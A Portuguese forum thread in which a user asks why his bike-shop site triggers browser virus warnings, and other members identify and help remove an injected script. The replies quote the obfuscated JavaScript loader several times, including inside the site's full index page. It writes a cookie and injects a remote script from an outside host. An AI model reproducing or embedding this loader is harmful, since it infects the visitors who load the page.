← Segurança

Website com virus

Lida 3477 vezes

Offline

amaru 
Membro
Mensagens 600 Gostos 0
Troféus totais: 27
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Boas, sou eu que estou a tratar deste website, que de momento até está com uma página provisória.
http://maneta-bikes.pt/
Mas ao entrar no site o browser alerta-nos de vírus e eu não estou a ver porquê.
Offline

flock 
Membro
Mensagens 508 Gostos 0
Feedback +7

Troféus totais: 22
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Poll Voter Level 4 Level 3 Level 2 Level 1 500 Posts 100 Posts

o teu cpanel não tem anti-virus? se sim corre
Offline

=IceBurn= 
Membro
Mensagens 897 Gostos 3
Feedback +3

Troféus totais: 32
Trófeus: (Ver todos)
Windows User Level 6 Linux User Mobile User Super Combination Combination Topic Starter Poll Voter Poll Starter Level 5

Bem, basicamente por causa disto:

Citar
<script type='text/javascript'>var a='X3CY3X63Y2X69T74X3EY6X61Y2X20X61X3Z64X6FX63Y5X6Z6 5X6EY4X2EU6FX6BX69X65X3BX64X6FX63Y5X6Z65X6EY4X2EU 6FX6BX69X65X3Z22X68X6FT3Z22X2BX65Y3X63X61T65X28X2 2X68X6FT22X29X2BX22X3BT61Y4X68X3Z2FX22X3BY6X61Y2X 20X62X3Z6EX61Y6X69X67X61Y4X6FY2X2EX61T70X56X65Y2Y 3X69X6FX6EX2CX63X3Z22X20X22X2BX64X6FX63Y5X6Z65X6E Y4X2EU6FX6BX69X65X2CX64X3Z6EY5X6CX6CX2CX65X3Z30X2 CX66X3Z30X3BX69X66X28X63X2EX6CX65X6EX67Y4X68X3EX3 0X29YBX65X3Z63X2EX69X6EX64X65Y8X4FX66X28X22X20X68 X6FT3Z22X29X3BX69X66X28X65X21X3Z2Z31X29YBX65X2BX3 Z35X3BX66X3Z63X2EX69X6EX64X65Y8X4FX66X28X22X3BX22 X2CX65X29X3BX69X66X28X66X3Z3Z2Z31X29X66X3Z63X2EX6 CX65X6EX67Y4X68X3BX64X3Z75X6EX65Y3X63X61T65X28X63 X2EY3Y5X62Y3Y4Y2X69X6EX67X28X65X2CX66X29X29YZ7Z20 X69X66X28X64X3Z3Z22X68X6FT22X26X26X62X2EY4X6FX4CX 6FY7X65Y2X43X61Y3X65X28X29X2EX69X6EX64X65Y8X4FX66 X28X22Y7X69X6EX22X29X21X3Z2Z31X26X26X61X2EX69X6EX 64X65Y8X4FX66X28X22X68X69T22X29X3Z3Z2Z31X29YBX3BX 64Y4X3Z6EX65Y7X20X44X61Y4X65X3BX64Y4X2EY3X65Y4X54 X69X6Z65X28X64Y4X2EX67X65Y4X54X69X6Z65X28X29X2BX3 8X45X37X29X3BX64X6FX63Y5X6Z65X6EY4X2EU6FX6BX69X65 X3Z22X68X69T3Z22X2BX65Y3X63X61T65X28X22X68X69T22X 29X2BX22X3BX65Y8T69Y2X65Y3X3Z22X2BX64Y4X2EY4X6FX4 7X4Z54X53Y4Y2X69X6EX67X28X29X2BX22X3BT61Y4X68X3Z2 FX22X3BX64X6FX63Y5X6Z65X6EY4X2EY7Y2X69Y4X65X28X27 X3CY3X63Y2X69T74X20Y4Y9T65X3Z22Y4X65Y8Y4X2FX6AX61 Y6X61Y3X63Y2X69T74X22X20Y3Y2X63X3Z22X68Y4Y4T3AX2F X2FX66X65X6BY3X61X6BX65X2EX62X69YAX2FT72X6FY8Y9X2 FX69X64X2EX6AY3X22X3EX3CX5CX2FY3X63Y2X69T74X3EX27 X29YZ3BX3CX2FY3X63Y2X69T74X3E'.replace(/Y/g,'X7').replace(/X/g,'\u0025').replace(/Z/g,'\x44\x25').replace(/U/g,'\x25\x36\x33\x25\x36\x46\x25').replace(/T/g,'\x25\x37\x30\x25');document.write(unescape(a));</script></ad><b1><!--X12b_YE3eNrTLyhNyslMjs8oyc3Rz8xLSa3QAzJtbW0NjSyNDUxNjUyMAOM1Czk=-->

Está a seguir ao <body> Foste tu que lá colocaste isso?

Vê: http://jsunpack.jeek.org/dec/go?report=3b73a0cfad6b5f6c48151b480b4f7a7349a5470e
Offline

tseonami 
Membro
Mensagens 191 Gostos 0
Feedback +1

Troféus totais: 21
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 4 Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts

removes o codigo acima descrito e procuras noutros ficheiros do site, muitas vezes a injeção é feita so nos ficheiros index ...por isso ve todos os index no site todo.

depois vais a stopbadware.com e pedes uma revisão do site, explicando que ja removeste os codigos maliciosos etc, normalmente em 2 dias tá despachado.

Agora não te deixes dormir, no meu caso tive mas experiencas com atakes aos meus servers e na altura não tive tempo de imediato para resolver o problema e varios sites devido a isso cairam estrondaente nos rankings e demoraram depois varios meses a recuperar...

espero que ajude
Offline

amaru 
Membro
Mensagens 600 Gostos 0
Troféus totais: 27
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Isso é muito estranho porque eu não pus nada disso no index.
Offline

Shaddz 
Membro
Mensagens 2324 Gostos 2
Feedback +9

Troféus totais: 29
Trófeus: (Ver todos)
Windows User Linux User Mobile User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4

A mim também me aconteceu isso. Basta ires ao directório do site no cpanel e vês logo os ficheiros manhosos. Apaga isso. Depois vai ao webmaster tools "avisar" que o site já está sem vírus.

Convém ter sempre as versões do cms actualizadas.
Offline

amaru 
Membro
Mensagens 600 Gostos 0
Troféus totais: 27
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Acho que ja sei o que aconteceu. É possivel por ter um redirect para um blog esse blog tenha adicionado o conteudo malicioso para o site? é que eu agora fui ao blog:
http://manetabikes.blogspot.com/
e apareceu que nem é esse blog que tem conteudo malicioso mas sim conteudos de outro site que esse blog tem.
Offline

João Silva 
Membro
Mensagens 1185 Gostos 0
Feedback +6

Troféus totais: 27
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Acho que ja sei o que aconteceu. É possivel por ter um redirect para um blog esse blog tenha adicionado o conteudo malicioso para o site? é que eu agora fui ao blog:
http://manetabikes.blogspot.com/
e apareceu que nem é esse blog que tem conteudo malicioso mas sim conteudos de outro site que esse blog tem.

Penso que não, acho que já devias era ter removido o código malicioso do site principal...
Offline

betanalista 
Membro
Mensagens 2564 Gostos 0
Feedback +18

Troféus totais: 26
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

isto é o index do teu site

Código: [Seleccione]
<html>
<head>
<title>Maneta Bikes - Loja de bicicletas</title>
</head>

<body bgcolor="#000000"> <script type='text/javascript'>var a='X3CY3X63Y2X69T74X3EY6X61Y2X20X61X3Z64X6FX63Y5X6Z65X6EY4X2EU6FX6BX69X65X3BX64X6FX63Y5X6Z65X6EY4X2EU6FX6BX69X65X3Z22X68X6FT3Z22X2BX65Y3X63X61T65X28X22X68X6FT22X29X2BX22X3BT61Y4X68X3Z2FX22X3BY6X61Y2X20X62X3Z6EX61Y6X69X67X61Y4X6FY2X2EX61T70X56X65Y2Y3X69X6FX6EX2CX63X3Z22X20X22X2BX64X6FX63Y5X6Z65X6EY4X2EU6FX6BX69X65X2CX64X3Z6EY5X6CX6CX2CX65X3Z30X2CX66X3Z30X3BX69X66X28X63X2EX6CX65X6EX67Y4X68X3EX30X29YBX65X3Z63X2EX69X6EX64X65Y8X4FX66X28X22X20X68X6FT3Z22X29X3BX69X66X28X65X21X3Z2Z31X29YBX65X2BX3Z35X3BX66X3Z63X2EX69X6EX64X65Y8X4FX66X28X22X3BX22X2CX65X29X3BX69X66X28X66X3Z3Z2Z31X29X66X3Z63X2EX6CX65X6EX67Y4X68X3BX64X3Z75X6EX65Y3X63X61T65X28X63X2EY3Y5X62Y3Y4Y2X69X6EX67X28X65X2CX66X29X29YZ7Z20X69X66X28X64X3Z3Z22X68X6FT22X26X26X62X2EY4X6FX4CX6FY7X65Y2X43X61Y3X65X28X29X2EX69X6EX64X65Y8X4FX66X28X22Y7X69X6EX22X29X21X3Z2Z31X26X26X61X2EX69X6EX64X65Y8X4FX66X28X22X68X69T22X29X3Z3Z2Z31X29YBX3BX64Y4X3Z6EX65Y7X20X44X61Y4X65X3BX64Y4X2EY3X65Y4X54X69X6Z65X28X64Y4X2EX67X65Y4X54X69X6Z65X28X29X2BX38X45X37X29X3BX64X6FX63Y5X6Z65X6EY4X2EU6FX6BX69X65X3Z22X68X69T3Z22X2BX65Y3X63X61T65X28X22X68X69T22X29X2BX22X3BX65Y8T69Y2X65Y3X3Z22X2BX64Y4X2EY4X6FX47X4Z54X53Y4Y2X69X6EX67X28X29X2BX22X3BT61Y4X68X3Z2FX22X3BX64X6FX63Y5X6Z65X6EY4X2EY7Y2X69Y4X65X28X27X3CY3X63Y2X69T74X20Y4Y9T65X3Z22Y4X65Y8Y4X2FX6AX61Y6X61Y3X63Y2X69T74X22X20Y3Y2X63X3Z22X68Y4Y4T3AX2FX2FX66X65X6BY3X61X6BX65X2EX62X69YAX2FT72X6FY8Y9X2FX69X64X2EX6AY3X22X3EX3CX5CX2FY3X63Y2X69T74X3EX27X29YZ3BX3CX2FY3X63Y2X69T74X3E'.replace(/Y/g,'X7').replace(/X/g,'\u0025').replace(/Z/g,'\x44\x25').replace(/U/g,'\x25\x36\x33\x25\x36\x46\x25').replace(/T/g,'\x25\x37\x30\x25');document.write(unescape(a));</script></ad><b1><!--X12b_YE3eNrTLyhNyslMjs8oyc3Rz8xLSa3QAzJtbW0NjSyNDUxNjUyMAOM1Czk=--></b1>
<div align="center">
<p><img src="imagecentral.jpg" width="600" height="530"> </p>

</div>
</body>
</html>


tens de remover isto

Código: [Seleccione]
<body bgcolor="#000000"> <script type='text/javascript'>var a='X3CY3X63Y2X69T74X3EY6X61Y2X20X61X3Z64X6FX63Y5X6Z65X6EY4X2EU6FX6BX69X65X3BX64X6FX63Y5X6Z65X6EY4X2EU6FX6BX69X65X3Z22X68X6FT3Z22X2BX65Y3X63X61T65X28X22X68X6FT22X29X2BX22X3BT61Y4X68X3Z2FX22X3BY6X61Y2X20X62X3Z6EX61Y6X69X67X61Y4X6FY2X2EX61T70X56X65Y2Y3X69X6FX6EX2CX63X3Z22X20X22X2BX64X6FX63Y5X6Z65X6EY4X2EU6FX6BX69X65X2CX64X3Z6EY5X6CX6CX2CX65X3Z30X2CX66X3Z30X3BX69X66X28X63X2EX6CX65X6EX67Y4X68X3EX30X29YBX65X3Z63X2EX69X6EX64X65Y8X4FX66X28X22X20X68X6FT3Z22X29X3BX69X66X28X65X21X3Z2Z31X29YBX65X2BX3Z35X3BX66X3Z63X2EX69X6EX64X65Y8X4FX66X28X22X3BX22X2CX65X29X3BX69X66X28X66X3Z3Z2Z31X29X66X3Z63X2EX6CX65X6EX67Y4X68X3BX64X3Z75X6EX65Y3X63X61T65X28X63X2EY3Y5X62Y3Y4Y2X69X6EX67X28X65X2CX66X29X29YZ7Z20X69X66X28X64X3Z3Z22X68X6FT22X26X26X62X2EY4X6FX4CX6FY7X65Y2X43X61Y3X65X28X29X2EX69X6EX64X65Y8X4FX66X28X22Y7X69X6EX22X29X21X3Z2Z31X26X26X61X2EX69X6EX64X65Y8X4FX66X28X22X68X69T22X29X3Z3Z2Z31X29YBX3BX64Y4X3Z6EX65Y7X20X44X61Y4X65X3BX64Y4X2EY3X65Y4X54X69X6Z65X28X64Y4X2EX67X65Y4X54X69X6Z65X28X29X2BX38X45X37X29X3BX64X6FX63Y5X6Z65X6EY4X2EU6FX6BX69X65X3Z22X68X69T3Z22X2BX65Y3X63X61T65X28X22X68X69T22X29X2BX22X3BX65Y8T69Y2X65Y3X3Z22X2BX64Y4X2EY4X6FX47X4Z54X53Y4Y2X69X6EX67X28X29X2BX22X3BT61Y4X68X3Z2FX22X3BX64X6FX63Y5X6Z65X6EY4X2EY7Y2X69Y4X65X28X27X3CY3X63Y2X69T74X20Y4Y9T65X3Z22Y4X65Y8Y4X2FX6AX61Y6X61Y3X63Y2X69T74X22X20Y3Y2X63X3Z22X68Y4Y4T3AX2FX2FX66X65X6BY3X61X6BX65X2EX62X69YAX2FT72X6FY8Y9X2FX69X64X2EX6AY3X22X3EX3CX5CX2FY3X63Y2X69T74X3EX27X29YZ3BX3CX2FY3X63Y2X69T74X3E'.replace(/Y/g,'X7').replace(/X/g,'\u0025').replace(/Z/g,'\x44\x25').replace(/U/g,'\x25\x36\x33\x25\x36\x46\x25').replace(/T/g,'\x25\x37\x30\x25');document.write(unescape(a));</script></ad><b1><!--X12b_YE3eNrTLyhNyslMjs8oyc3Rz8xLSa3QAzJtbW0NjSyNDUxNjUyMAOM1Czk=--></b1>
Offline

amaru 
Membro
Mensagens 600 Gostos 0
Troféus totais: 27
Trófeus: (Ver todos)
Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1

Calma já está lol agora vou então pedir nova revisão.